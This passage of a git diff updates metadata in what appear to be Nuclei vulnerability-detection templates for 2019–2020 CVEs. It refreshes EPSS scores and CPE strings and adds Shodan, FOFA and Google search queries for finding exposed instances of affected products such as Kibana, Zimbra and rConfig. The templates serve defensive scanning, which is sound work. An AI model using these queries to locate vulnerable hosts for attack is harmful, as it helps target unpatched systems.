b/http/cves/2019/CVE-2019-3911.yaml @@ -19,13 +19,15 @@ info: cve-id: CVE-2019-3911 cwe-id: CWE-79 epss-score: 0.00195 - epss-percentile: 0.5643 + epss-percentile: 0.56966 cpe: cpe:2.3:a:labkey:labkey_server:*:*:community:*:*:*:*:* metadata: max-request: 1 vendor: labkey product: labkey_server shodan-query: 'Server: Labkey' + fofa-query: 'title="sign in: /home"' + google-query: 'intitle:"sign in: /home"' tags: cve,cve2019,xss,labkey,tenable http: diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml index 7e2dd681ab..ea223038cf 100644 --- a/http/cves/2019/CVE-2019-3912.yaml +++ b/http/cves/2019/CVE-2019-3912.yaml @@ -28,6 +28,8 @@ info: vendor: labkey product: labkey_server shodan-query: 'Server: Labkey' + fofa-query: 'title="sign in: /home"' + google-query: 'intitle:"sign in: /home"' tags: cve2019,cve,tenable,redirect,labkey http: diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml index e69880e750..fa607c0894 100644 --- a/http/cves/2019/CVE-2019-3929.yaml +++ b/http/cves/2019/CVE-2019-3929.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-3929 cwe-id: CWE-78,CWE-79 - epss-score: 0.97293 - epss-percentile: 0.99855 + epss-score: 0.97363 + epss-percentile: 0.99899 cpe: cpe:2.3:o:crestron:am-100_firmware:1.6.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-5127.yaml b/http/cves/2019/CVE-2019-5127.yaml index bbeb5c79e5..3b2a4fb1e7 100644 --- a/http/cves/2019/CVE-2019-5127.yaml +++ b/http/cves/2019/CVE-2019-5127.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-5127 cwe-id: CWE-78 epss-score: 0.97409 - epss-percentile: 0.99922 + epss-percentile: 0.99928 cpe: cpe:2.3:a:youphptube:youphptube_encoder:2.3:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml index 9643d6652c..b2cc82e5b9 100644 --- a/http/cves/2019/CVE-2019-5418.yaml +++ b/http/cves/2019/CVE-2019-5418.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: rubyonrails product: rails + shodan-query: cpe:"cpe:2.3:a:rubyonrails:rails" tags: cve,cve2019,rails,lfi,disclosure,edb,rubyonrails http: diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml index aabe21db32..df24f87f58 100644 --- a/http/cves/2019/CVE-2019-5434.yaml +++ b/http/cves/2019/CVE-2019-5434.yaml @@ -30,6 +30,8 @@ info: vendor: revive-sas product: revive_adserver shodan-query: http.favicon.hash:106844876 + fofa-query: icon_hash=106844876 + google-query: intitle:"revive adserver" tags: cve,cve2019,edb,packetstorm,revive,adserver,rce,revive-sas http: diff --git a/http/cves/2019/CVE-2019-6112.yaml b/http/cves/2019/CVE-2019-6112.yaml index c63fc8341f..88c9839a3b 100644 --- a/http/cves/2019/CVE-2019-6112.yaml +++ b/http/cves/2019/CVE-2019-6112.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-6112 cwe-id: CWE-79 epss-score: 0.00126 - epss-percentile: 0.46229 + epss-percentile: 0.47188 cpe: cpe:2.3:a:graphpaperpress:sell_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-6340.yaml b/http/cves/2019/CVE-2019-6340.yaml index da47434b5b..7c78ae9895 100644 --- a/http/cves/2019/CVE-2019-6340.yaml +++ b/http/cves/2019/CVE-2019-6340.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.1 cve-id: CVE-2019-6340 cwe-id: CWE-502 - epss-score: 0.97487 - epss-percentile: 0.9997 + epss-score: 0.97451 + epss-percentile: 0.9995 cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-6715.yaml b/http/cves/2019/CVE-2019-6715.yaml index 4ff679ed66..69c29fdb54 100644 --- a/http/cves/2019/CVE-2019-6715.yaml +++ b/http/cves/2019/CVE-2019-6715.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-6715 - epss-score: 0.23312 - epss-percentile: 0.96449 + epss-score: 0.3388 + epss-percentile: 0.97075 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml index 697808948e..923762042a 100644 --- a/http/cves/2019/CVE-2019-6799.yaml +++ b/http/cves/2019/CVE-2019-6799.yaml @@ -32,6 +32,7 @@ info: shodan-query: title:"phpmyadmin" fofa-query: body="pma_servername" && body="4.8.4" hunter-query: app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4" + google-query: intitle:"phpmyadmin" tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive,sqli http: diff --git a/http/cves/2019/CVE-2019-6802.yaml b/http/cves/2019/CVE-2019-6802.yaml index 256e3eeb8a..5530d65be2 100644 --- a/http/cves/2019/CVE-2019-6802.yaml +++ b/http/cves/2019/CVE-2019-6802.yaml @@ -28,6 +28,7 @@ info: vendor: python product: pypiserver shodan-query: html:"pypiserver" + fofa-query: body="pypiserver" tags: cve,cve2019,crlf,pypiserver,python http: diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index 54e5da5d21..317c6cbaa6 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -30,6 +30,8 @@ info: vendor: qnap product: photo_station shodan-query: 'Content-Length: 580 "http server 1.0"' + fofa-query: title="photo station" + google-query: intitle:"qnap" tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss http: diff --git a/http/cves/2019/CVE-2019-7219.yaml b/http/cves/2019/CVE-2019-7219.yaml index ae03168b7b..ae5c95c0c9 100644 --- a/http/cves/2019/CVE-2019-7219.yaml +++ b/http/cves/2019/CVE-2019-7219.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-7219 cwe-id: CWE-79 epss-score: 0.00113 - epss-percentile: 0.43765 + epss-percentile: 0.44665 cpe: cpe:2.3:a:zarafa:webaccess:7.2.0-48204:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-7238.yaml b/http/cves/2019/CVE-2019-7238.yaml index bf2669d2f9..028a16d634 100644 --- a/http/cves/2019/CVE-2019-7238.yaml +++ b/http/cves/2019/CVE-2019-7238.yaml @@ -20,12 +20,13 @@ info: cvss-score: 9.8 cve-id: CVE-2019-7238 epss-score: 0.974 - epss-percentile: 0.99915 + epss-percentile: 0.9992 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sonatype product: nexus + fofa-query: title="nexus repository manager" tags: cve,cve2019,nexus,rce,kev,sonatype http: diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index 0019bd0da1..e7f6e08a9f 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: nortekcontrol product: linear_emerge_essential_firmware + shodan-query: http.title:"emerge" + fofa-query: title="emerge" + google-query: intitle:"emerge" tags: cve,cve2019,emerge,lfi,edb,packetstorm,nortekcontrol http: diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index 9a0ccd103b..a1978abcfa 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -30,6 +30,8 @@ info: vendor: nortekcontrol product: linear_emerge_essential_firmware shodan-query: http.title:"eMerge" + fofa-query: title="emerge" + google-query: intitle:"emerge" tags: cve,cve2019,emerge,xss,packetstorm,nortek,nortekcontrol http: diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml index a12bf0c6d3..7c4bc35199 100644 --- a/http/cves/2019/CVE-2019-7256.yaml +++ b/http/cves/2019/CVE-2019-7256.yaml @@ -21,8 +21,8 @@ info: cvss-score: 10 cve-id: CVE-2019-7256 cwe-id: CWE-78 - epss-score: 0.97388 - epss-percentile: 0.99904 + epss-score: 0.97443 + epss-percentile: 0.99947 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,7 +30,9 @@ info: vendor: nortekcontrol product: linear_emerge_essential_firmware shodan-query: title:"eMerge" - tags: cve,cve2019,emerge,rce,edb,nortekcontrol + fofa-query: title="emerge" + google-query: intitle:"emerge" + tags: cve,cve2019,emerge,rce,edb,nortekcontrol,kev variables: file: "{{rand_text_alpha(10)}}" diff --git a/http/cves/2019/CVE-2019-7315.yaml b/http/cves/2019/CVE-2019-7315.yaml index dbb2045f39..77d5d5b8ca 100644 --- a/http/cves/2019/CVE-2019-7315.yaml +++ b/http/cves/2019/CVE-2019-7315.yaml @@ -19,13 +19,13 @@ info: cvss-score: 7.5 cve-id: CVE-2019-7315 cwe-id: CWE-22 - epss-score: 0.0172 - epss-percentile: 0.87556 - cpe: cpe:2.3:o:genieaccess:wip3bvaf_firmware:*:*:*:*:*:*:*:* + epss-score: 0.0143 + epss-percentile: 0.86533 + cpe: cpe:2.3:h:genieaccess:wip3bvaf:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: genieaccess - product: wip3bvaf_firmware + product: wip3bvaf tags: cve,cve2019,camera,genie,lfi,iot,genieaccess http: diff --git a/http/cves/2019/CVE-2019-7609.yaml b/http/cves/2019/CVE-2019-7609.yaml index 5a2f4eef04..4ab0d87e0c 100644 --- a/http/cves/2019/CVE-2019-7609.yaml +++ b/http/cves/2019/CVE-2019-7609.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: elastic product: kibana + shodan-query: http.title:"kibana" + fofa-query: title="kibana" + google-query: intitle:"kibana" tags: cve,cve2019,kibana,rce,kev,elastic http: diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index 6555a9c9be..792103fc01 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -30,6 +30,8 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + fofa-query: title="aem sign in" + google-query: intitle:"aem sign in" tags: cve,cve2019,aem,adobe http: diff --git a/http/cves/2019/CVE-2019-8390.yaml b/http/cves/2019/CVE-2019-8390.yaml index d063a60bba..ccd06cac6c 100644 --- a/http/cves/2019/CVE-2019-8390.yaml +++ b/http/cves/2019/CVE-2019-8390.yaml @@ -15,13 +15,14 @@ info: - http://qdpm.net/download-qdpm-free-project-management - https://nvd.nist.gov/vuln/detail/CVE-2019-8390 - http://sourceforge.net/projects/qdpm + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-8390 cwe-id: CWE-79 - epss-score: 0.0161 - epss-percentile: 0.86055 + epss-score: 0.01911 + epss-percentile: 0.88548 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +30,7 @@ info: vendor: qdpm product: qdpm shodan-query: http.favicon.hash:762074255 + fofa-query: icon_hash=762074255 tags: cve,cve2019,xss,qdpm,authenticated,edb http: diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index f1844c79dd..2d08ccdea3 100644 --- a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -20,7 +20,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-8442 epss-score: 0.97131 - epss-percentile: 0.99777 + epss-percentile: 0.99799 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index 808522bcd6..879faef983 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-8446 cwe-id: CWE-863 epss-score: 0.15691 - epss-percentile: 0.95793 + epss-percentile: 0.95925 cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index 1d8c7ad05f..b1ab518e46 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2019-8449 cwe-id: CWE-306 - epss-score: 0.24444 - epss-percentile: 0.96513 + epss-score: 0.29471 + epss-percentile: 0.96907 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index f3e7f952fa..e06564bff8 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -28,6 +28,9 @@ info: max-request: 1 vendor: digitaldruid product: hoteldruid + shodan-query: http.title:"hoteldruid" + fofa-query: title="hoteldruid" + google-query: intitle:"hoteldruid" tags: cve2019,cve,packetstorm,xss,hoteldruid,edb,digitaldruid http: diff --git a/http/cves/2019/CVE-2019-8982.yaml b/http/cves/2019/CVE-2019-8982.yaml index 18e00665dc..0f039a65c1 100644 --- a/http/cves/2019/CVE-2019-8982.yaml +++ b/http/cves/2019/CVE-2019-8982.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.6 cve-id: CVE-2019-8982 cwe-id: CWE-918 - epss-score: 0.02482 - epss-percentile: 0.89006 + epss-score: 0.01814 + epss-percentile: 0.88158 cpe: cpe:2.3:a:wavemaker:wavemarker_studio:6.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9618.yaml b/http/cves/2019/CVE-2019-9618.yaml index b253e3b500..223c527492 100644 --- a/http/cves/2019/CVE-2019-9618.yaml +++ b/http/cves/2019/CVE-2019-9618.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-9618 cwe-id: CWE-22 - epss-score: 0.04914 - epss-percentile: 0.9261 + epss-score: 0.03376 + epss-percentile: 0.91411 cpe: cpe:2.3:a:gracemedia_media_player_project:gracemedia_media_player:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9632.yaml b/http/cves/2019/CVE-2019-9632.yaml index 874bd34942..cb87c282dd 100644 --- a/http/cves/2019/CVE-2019-9632.yaml +++ b/http/cves/2019/CVE-2019-9632.yaml @@ -13,12 +13,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-9632 - cpe: cpe:2.3:a:esafenet:electronic_document_security_management_system:v3:*:*:*:*:*:*:* epss-score: 0.00183 epss-percentile: 0.54622 + cpe: cpe:2.3:a:esafenet:electronic_document_security_management_system:v3:*:*:*:*:*:*:* metadata: - product: electronic_document_security_management_system vendor: esafenet + product: electronic_document_security_management_system fofa-query: title="电子文档安全管理系统" tags: cve,cve2019,esafenet,lfi diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml index 106cf248d2..b25322e974 100644 --- a/http/cves/2019/CVE-2019-9670.yaml +++ b/http/cves/2019/CVE-2019-9670.yaml @@ -22,13 +22,16 @@ info: cvss-score: 9.8 cve-id: CVE-2019-9670 cwe-id: CWE-611 - epss-score: 0.97484 - epss-percentile: 0.99968 + epss-score: 0.97461 + epss-percentile: 0.99957 cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: synacor product: zimbra_collaboration_suite + shodan-query: http.title:"zimbra collaboration suite" + fofa-query: title="zimbra web client sign in" + google-query: intitle:"zimbra collaboration suite" tags: cve,cve2019,zimbra,xxe,kev,edb,packetstorm,synacor http: diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml index f7ec3dec2b..9f933eec9b 100644 --- a/http/cves/2019/CVE-2019-9726.yaml +++ b/http/cves/2019/CVE-2019-9726.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-9726 cwe-id: CWE-22 epss-score: 0.03616 - epss-percentile: 0.91446 + epss-percentile: 0.91664 cpe: cpe:2.3:o:eq-3:ccu3_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index a39fdef2a7..f42e4cec13 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml @@ -19,13 +19,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-9733 - epss-score: 0.91018 - epss-percentile: 0.98791 + epss-score: 0.85254 + epss-percentile: 0.98535 cpe: cpe:2.3:a:jfrog:artifactory:6.7.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jfrog product: artifactory + shodan-query: cpe:"cpe:2.3:a:jfrog:artifactory" tags: cve,cve2019,packetstorm,artifactory,login,jfrog http: diff --git a/http/cves/2019/CVE-2019-9915.yaml b/http/cves/2019/CVE-2019-9915.yaml index 0cb1c360e3..84c0a30781 100644 --- a/http/cves/2019/CVE-2019-9915.yaml +++ b/http/cves/2019/CVE-2019-9915.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-9915 cwe-id: CWE-601 epss-score: 0.00123 - epss-percentile: 0.45694 + epss-percentile: 0.4663 cpe: cpe:2.3:a:get-simple.:getsimplecms:3.3.13:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml index caff895c05..b3d1c3c9c4 100644 --- a/http/cves/2019/CVE-2019-9922.yaml +++ b/http/cves/2019/CVE-2019-9922.yaml @@ -13,13 +13,15 @@ info: - https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md - https://extensions.joomla.org/extension/je-messenger/ - https://nvd.nist.gov/vuln/detail/CVE-2019-9922 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/azd-cert/CVE classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-9922 cwe-id: CWE-22 - epss-score: 0.01171 - epss-percentile: 0.83428 + epss-score: 0.00972 + epss-percentile: 0.83335 cpe: cpe:2.3:a:harmistechnology:je_messenger:1.2.2:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-0618.yaml b/http/cves/2020/CVE-2020-0618.yaml index db74d9daff..e9902ace9e 100644 --- a/http/cves/2020/CVE-2020-0618.yaml +++ b/http/cves/2020/CVE-2020-0618.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-0618 cwe-id: CWE-502 - epss-score: 0.97439 - epss-percentile: 0.99944 + epss-score: 0.97334 + epss-percentile: 0.99886 cpe: cpe:2.3:a:microsoft:sql_server:2012:sp4:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index c4ce13b9e8..65fe35feee 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml @@ -20,13 +20,14 @@ info: cvss-score: 8.8 cve-id: CVE-2020-10199 cwe-id: CWE-917 - epss-score: 0.97392 - epss-percentile: 0.99907 + epss-score: 0.97327 + epss-percentile: 0.99883 cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: sonatype product: nexus + fofa-query: title="nexus repository manager" tags: cve2020,cve,packetstorm,sonatype,nexus,rce,kev variables: username: admin diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index ea87e49534..8e66ece6f0 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-10220 cwe-id: CWE-89 epss-score: 0.03051 - epss-percentile: 0.90763 + epss-percentile: 0.90974 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: rconfig product: rconfig shodan-query: title:"rConfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve,cve2020,packetstorm,rconfig,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml index 984c7f9d15..5d28634640 100644 --- a/http/cves/2020/CVE-2020-10546.yaml +++ b/http/cves/2020/CVE-2020-10546.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2020-10546 cwe-id: CWE-89 epss-score: 0.38355 - epss-percentile: 0.97128 + epss-percentile: 0.97221 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rconfig product: rconfig + shodan-query: http.title:"rconfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2020,cve,rconfig,sqli http: diff --git a/http/cves/2020/CVE-2020-10547.yaml b/http/cves/2020/CVE-2020-10547.yaml index ec66cff958..058e401921 100644 --- a/http/cves/2020/CVE-2020-10547.yaml +++ b/http/cves/2020/CVE-2020-10547.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: rconfig product: rconfig + shodan-query: http.title:"rconfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve,cve2020,rconfig,sqli http: diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index 77e8a662ea..a1aca44fc0 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -25,6 +25,9 @@ info: max-request: 1 vendor: rconfig product: rconfig + shodan-query: http.title:"rconfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve,cve2020,rconfig,sqli http: diff --git a/http/cves/2020/CVE-2020-10549.yaml b/http/cves/2020/CVE-2020-10549.yaml index 52a7cee915..e427cc0719 100644 --- a/http/cves/2020/CVE-2020-10549.yaml +++ b/http/cves/2020/CVE-2020-10549.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2020-10549 cwe-id: CWE-89 epss-score: 0.38355 - epss-percentile: 0.97128 + epss-percentile: 0.97221 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rconfig product: rconfig + shodan-query: http.title:"rconfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve,cve2020,rconfig,sqli http: diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index 9e85dd16c1..f8a14a53ac 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -14,18 +14,22 @@ info: - https://www.exploit-db.com/exploits/50405 - https://nvd.nist.gov/vuln/detail/CVE-2020-10770 - https://bugzilla.redhat.com/show_bug.cgi?id=1846270 + - https://github.com/soosmile/POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2020-10770 cwe-id: CWE-918 - epss-score: 0.3389 - epss-percentile: 0.96671 + epss-score: 0.16545 + epss-percentile: 0.96007 cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: redhat product: keycloak + shodan-query: http.html:"keycloak" + fofa-query: title="keycloak" + google-query: intitle:"keycloak" tags: cve,cve2020,keycloak,ssrf,oast,blind,packetstorm,edb,redhat http: diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml index 90cab3e5d6..e5deffd637 100644 --- a/http/cves/2020/CVE-2020-10973.yaml +++ b/http/cves/2020/CVE-2020-10973.yaml @@ -30,6 +30,7 @@ info: vendor: wavlink product: wn530hg4_firmware shodan-query: http.html:"Wavlink" + fofa-query: body="wavlink" tags: cve,cve2020,exposure,wavlink http: diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index 9c883a9ecc..81f2195e88 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -26,6 +26,9 @@ info: max-request: 2 vendor: glpi-project product: glpi + shodan-query: http.title:"glpi" + fofa-query: icon_hash="-1474875778" + google-query: intitle:"glpi" tags: cve,cve2020,redirect,glpi,glpi-project http: diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index b7c40c2109..d321cfa650 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml @@ -27,6 +27,8 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" + fofa-query: title="grafana" + google-query: intitle:"grafana" tags: cve2020,cve,xss,grafana,hackerone http: diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml index 25dae9851f..24f8c3c185 100644 --- a/http/cves/2020/CVE-2020-11450.yaml +++ b/http/cves/2020/CVE-2020-11450.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-11450 - epss-score: 0.59818 - epss-percentile: 0.9769 + epss-score: 0.66624 + epss-percentile: 0.97932 cpe: cpe:2.3:a:microstrategy:microstrategy_web:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index 5b39e49bf0..8bde388e41 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-11530 cwe-id: CWE-89 epss-score: 0.83664 - epss-percentile: 0.98377 + epss-percentile: 0.98459 cpe: cpe:2.3:a:idangero:chop_slider:3.0:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml index f1a7556a7d..9c279b6f1d 100644 --- a/http/cves/2020/CVE-2020-11546.yaml +++ b/http/cves/2020/CVE-2020-11546.yaml @@ -28,6 +28,8 @@ info: vendor: superwebmailer product: superwebmailer shodan-query: title:"SuperWebMailer" + fofa-query: title="superwebmailer" + google-query: intitle:"superwebmailer" tags: cve,cve2020,rce,superwebmailer http: diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index 093f38b1fd..18eecc9895 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-11547 cwe-id: CWE-306 epss-score: 0.0011 - epss-percentile: 0.43127 + epss-percentile: 0.44069 cpe: cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: paessler product: prtg_network_monitor shodan-query: title:"prtg" + fofa-query: title="prtg" + google-query: intitle:"prtg" tags: cve2020,cve,prtg,disclosure,paessler http: diff --git a/http/cves/2020/CVE-2020-11710.yaml b/http/cves/2020/CVE-2020-11710.yaml index 5fca7e72a8..c8536d75dc 100644 --- a/http/cves/2020/CVE-2020-11710.yaml +++ b/http/cves/2020/CVE-2020-11710.yaml @@ -27,6 +27,7 @@ info: vendor: konghq product: docker-kong framework: kong + shodan-query: cpe:"cpe:2.3:a:konghq:docker-kong" tags: cve,cve2020,kong,konghq http: diff --git a/http/cves/2020/CVE-2020-11738.yaml b/http/cves/2020/CVE-2020-11738.yaml index 35696af729..687f0d2eb3 100644 --- a/http/cves/2020/CVE-2020-11738.yaml +++ b/http/cves/2020/CVE-2020-11738.yaml @@ -31,6 +31,7 @@ info: vendor: snapcreek product: duplicator framework: wordpress + google-query: inurl:"/wp-content/plugins/duplicator" tags: cve,cve2020,kev,tenable,packetstorm,wordpress,wp-plugin,lfi,snapcreek http: diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index 7495b1df8e..8977168602 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -30,6 +30,7 @@ info: vendor: mitel product: micollab_audio\,_web_\&_video_conferencing shodan-query: html:"Mitel" html:"MiCollab" + fofa-query: body="mitel" html:"micollab" tags: cve,cve2020,packetstorm,mitel,micollab,lfi http: diff --git 